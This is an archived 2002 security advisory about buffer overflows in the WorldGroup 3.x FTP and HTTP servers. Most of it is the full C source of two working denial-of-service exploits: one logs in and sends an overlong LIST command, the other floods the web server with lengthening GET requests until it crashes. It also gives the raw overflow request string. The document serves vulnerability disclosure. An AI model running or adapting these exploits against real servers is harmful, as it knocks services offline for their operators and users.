28th Feb 2002 [SBWID-5152]
COMMAND
WorldGroup ftp & http buffer overflows
SYSTEMS AFFECTED
WorldGroup 3.x
PROBLEM
Limpid Byte team [http://lbyte.void.ru, lbyte@host.sk] reports :
For FTP server overflow on long LIST command.
For HTTP overflow on long request :
GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0
Proof of concept code :
=====================
DoS exploits by Limpid Byte team, also available from :
http://www.security.nnov.ru/files/worldgroupdos.zip
----------------- BEGIN FTP_DOS.C ---------------------
/*
by Limpid Byte project
http://lbyte.void.ru
lbyte@host.sk
[Worldgroup FTP Server Denial of Service]
More than 105 \"/\" in LIST command.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#define FOUND \"220\"
int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in blah;
struct hostent *he;
char cgiBuff[1024];
char *cgiPage[6];
WSADATA wsaData;
char cr[] = \"\\n\";
if (argc < 3)
{
printf(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K.\");
printf(\"\\n\\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\\n\\r USAGE:\\n\\r\");
printf(\"Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] \");
printf(\"\\n\\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \\n\");
exit(1);
}
cgiPage[0] = \"USER \";
cgiPage[1] = (argv[2]);
cgiPage[2] = \"PASS \";
cgiPage[3] = (argv[3]);
cgiPage[4] = \"PASV\";
cgiPage[5] = \"LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\\n\";
if(WSAStartup(0x101,&wsaData))
{
printf(\"Unable to initialize WinSock lib.\\n\");
exit(1);
}
printf(\"Let\'s crash the World!\\n\\r\");
printf(\"Coded by the [eaSt]:\\n\\r\");
printf(\"\\nConnecting %s on port 21...\\n\\n\", argv[1]);
sock = socket(AF_INET,SOCK_STREAM,0);
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(argv[1]);
blah.sin_port=htons(21);
if ((he = gethostbyname(argv[1])) != NULL)
{
memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
}
else
{
if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)
{
WSACleanup();
exit(1);
}
}
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)
{
WSACleanup();
exit(1);
}
memset(cgiBuff, 0, sizeof(cgiBuff));
cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
printf(\"<< %s\", cgiBuff);
send(sock,cgiPage[0],strlen(cgiPage[0]),0);
send(sock,cgiPage[1],strlen(cgiPage[1]),0);
send(sock,cr,1,0);
memset(cgiBuff, 0, sizeof(cgiBuff));
cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
printf(\">> %s %s\\n<< %s\", cgiPage[0], cgiPage[1], cgiBuff);
send(sock,cgiPage[2],strlen(cgiPage[2]),0);
send(sock,cgiPage[3],strlen(cgiPage[3]),0);
send(sock,cr,1,0);
memset(cgiBuff, 0, sizeof(cgiBuff));
cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
printf(\">> %s %s\\n<< %s\", cgiPage[2], cgiPage[3], cgiBuff);
send(sock,cgiPage[4],strlen(cgiPage[4]),0);
send(sock,cr,1,0);
memset(cgiBuff, 0, sizeof(cgiBuff));
cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
printf(\">> %s\\n<< %s\", cgiPage[4], cgiBuff);
send(sock,cgiPage[5],strlen(cgiPage[5]),0);
send(sock,cr,1,0);
memset(cgiBuff, 0, sizeof(cgiBuff));
cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
printf(\">> %s\\n<< %s\", cgiPage[5], cgiBuff);
printf(\"Try reconnect to %s\\n\", argv[1]);
WSACleanup();
return 0;
}
----------------- END FTP_DOS.C ---------------------
----------------- BEGIN WWW_DOS.C ---------------------
/*
by Limpid Byte project
http://lbyte.void.ru
lbyte@host.sk
Worldgroup Server Denial of Service for
Windows 9x/ME only.
Error between system fuction windows and
worldgroup from web interface.
REGUEST:
GET /signup/a.[aaaaaaaa....aaaa]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#define FOUND \"200\"
int main(int argc, char *argv[])
{
int sock, count;
struct sockaddr_in blah;
struct hostent *he;
char cgiBuff[1024];
WSADATA wsaData;
if (argc < 2)
{
printf(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\\n\");
printf(\"Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\\n\\n\");
printf(\" USAGE : www_dos.exe [HOST] \\n\");
printf(\" example : www_dos.exe 127.0.0.1 \\n\");
exit(1);
}
if(WSAStartup(0x101,&wsaData))
{
printf(\"Unable to initialize WinSock lib.\\n\");
exit(1);
}
printf(\"Let\'s crash the World!\\n\");
printf(\"Coded by the [eaSt]:\\n\");
printf(\"\\nScanning %s on port 80...\\n\\n\", argv[1]);
for (count = 0; count < 94; count++)
{
sock = socket(AF_INET,SOCK_STREAM,0);
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(argv[1]);
blah.sin_port=htons(80);
if ((he = gethostbyname(argv[1])) != NULL)
{
memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
}
else
{
if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)
{
WSACleanup();
exit(1);
}
}
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)
{
WSACleanup();
exit(1);
}
memset(cgiBuff, 0, sizeof(cgiBuff));
sprintf(cgiBuff, \"GET /signup/\");
memset(cgiBuff + 12, \'a\', 219 + count);
sprintf(cgiBuff + 12 + 219 + count, \".txt?=../test.txt HTTP/1.0\\n\\n\");
printf(\"Sending: %d symbols request\\n\", strlen(cgiBuff));
send(sock,cgiBuff,strlen(cgiBuff),0);
memset(cgiBuff, 0, sizeof(cgiBuff));
if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) {
printf(\"Crashed\\n\");
}
else {
cgiBuff[32] = 0;
if (strstr(cgiBuff,FOUND))
{
printf(\"Send (%s)\\n\", cgiBuff);
}
else
{
printf(\"Not Found (%s)\\n\", cgiBuff);
}
}
closesocket(sock);
}
printf(\"Try reconnect to %s\\n\", argv[1]);
WSACleanup();
return 0;
}
----------------- END WWW_DOS.C ---------------------
SOLUTION
Patch not available yet. Check :
http://www.gcomm.com
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH
